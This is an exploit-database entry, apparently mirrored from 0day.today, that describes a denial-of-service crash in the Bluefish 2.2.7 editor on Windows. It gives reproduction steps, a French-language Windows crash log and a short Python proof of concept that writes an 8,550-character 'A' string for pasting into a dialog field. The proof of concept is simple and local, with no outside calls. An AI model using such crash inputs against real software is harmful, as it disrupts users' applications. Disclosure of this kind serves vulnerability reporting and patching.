Lucene search
K

Bluefish 2.2.7 - Denial Of Service Vulnerability

đŸ—“ïžÂ 10 Oct 2015 00:00:00Reported by ZwXType 
zdt
 zdt
🔗 0day.today👁 38 Views

Bluefish 2.2.7 Denial Of Service Vulnerability - Restrict image location character input to prevent cras

Code
-----------------------------------------------------
  Exploit Title : bluefish - Denial Of Service Vulnerability
  Date : 02/10/2015
  Exploit Author :  ZwX
  Software Vendor : http://bluefish.openoffice.nl/index.html
  Software Link: http://bluefish.openoffice.nl/download.html
  Version: 2.2.7
  Tested on: Windows 7 
 -----------------------------------------------------

 ---------------------------
 * Solution - Fix & Patch: *
 ---------------------------

 - Restrict the number of characters in input Image Location.

 --------------------------------
  * Steps to Produce the Crash: *
 --------------------------------

 - 1. Execute bluefish.exe
 - 2. Copy  the AAAA...string from bof.txt to clipboard
 - 3. Go Menu -> Dialogues -> General -> Insert a thumbnail
 - 4. Paste it the input Image Location AAAA....string click Ok
 - 5. Software will Crash.

 --------------------------------
     * Crash Analysis Log: *
 --------------------------------

Version=1
EventType=APPCRASH
EventTime=130882648896881549
ReportType=2
Consent=1
UploadTime=130882648898909553
ReportIdentifier=a05ea4cd-6906-11e5-b6d3-f42aa1418182
IntegratorReportIdentifier=a05ea4cc-6906-11e5-b6d3-f42aa1418182
Response.BucketId=906884289
Response.BucketTable=17
Response.type=4
Sig[0].Name=Nom de l’application
Sig[0].Value=bluefish.exe
Sig[1].Name=Version de l’application
Sig[1].Value=2.2.7.0
Sig[2].Name=Horodatage de l’application
Sig[2].Value=54cf7349
Sig[3].Name=Nom du module par défaut
Sig[3].Value=msvcrt.dll
Sig[4].Name=Version du module par défaut
Sig[4].Value=7.0.7601.17744
Sig[5].Name=Horodateur du module par défaut
Sig[5].Value=4eeaf722
Sig[6].Name=Code de l’exception
Sig[6].Value=c0000005
Sig[7].Name=DĂ©calage de l’exception
Sig[7].Value=0000dbba
DynamicSig[1].Name=Version du systĂšme
DynamicSig[1].Value=6.1.7601.2.1.0.768.3
DynamicSig[2].Name=Identificateur de paramÚtres régionaux
DynamicSig[2].Value=1036
DynamicSig[22].Name=Information supplémentaire n° 1
DynamicSig[22].Value=0a9e
DynamicSig[23].Name=Information supplémentaire n° 2
DynamicSig[23].Value=0a9e372d3b4ad19135b953a78882e789
DynamicSig[24].Name=Information supplémentaire n° 3
DynamicSig[24].Value=0a9e
DynamicSig[25].Name=Information supplémentaire n° 4
DynamicSig[25].Value=0a9e372d3b4ad19135b953a78882e789
UI[2]=C:\Program Files\Bluefish\bluefish.exe
UI[3]=Bluefish a cessé de fonctionner
UI[4]=Windows peut rechercher une solution au problĂšme en ligne.
UI[5]=Rechercher une solution en ligne et fermer le programme
UI[6]=Rechercher ultérieurement une solution en ligne et fermer le programme
UI[7]=Fermer le programme
LoadedModule[0]=C:\Program Files\Bluefish\bluefish.exe
LoadedModule[1]=C:\Windows\SYSTEM32\ntdll.dll
LoadedModule[2]=C:\Windows\system32\kernel32.dll
LoadedModule[3]=C:\Windows\system32\KERNELBASE.dll
LoadedModule[4]=C:\Windows\system32\ADVAPI32.DLL
LoadedModule[5]=C:\Windows\system32\msvcrt.dll
LoadedModule[6]=C:\Windows\SYSTEM32\sechost.dll
LoadedModule[7]=C:\Windows\system32\RPCRT4.dll
..... ..... ..... ..... ..... ..... ..... .....
State[0].Key=Transport.DoneStage1
State[0].Value=1
State[1].Key=DataRequest
State[1].Value=Bucket=906884289/nBucketTable=17/nResponse=1/n
FriendlyEventName=Fonctionnement arrĂȘtĂ©
ConsentKey=APPCRASH
AppName=Bluefish
AppPath=C:\Program Files\Bluefish\bluefish.exe

 ------------------------
   * Proof Of Concept *
 ------------------------
 
 buffer = "\x41"*8550
  
 file = open("bluefish.txt","w")
 file.write(buffer)
 file.close()
 
 print "POC Created by ZwX"
 print " Email: [email protected]"

#  0day.today [2018-01-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation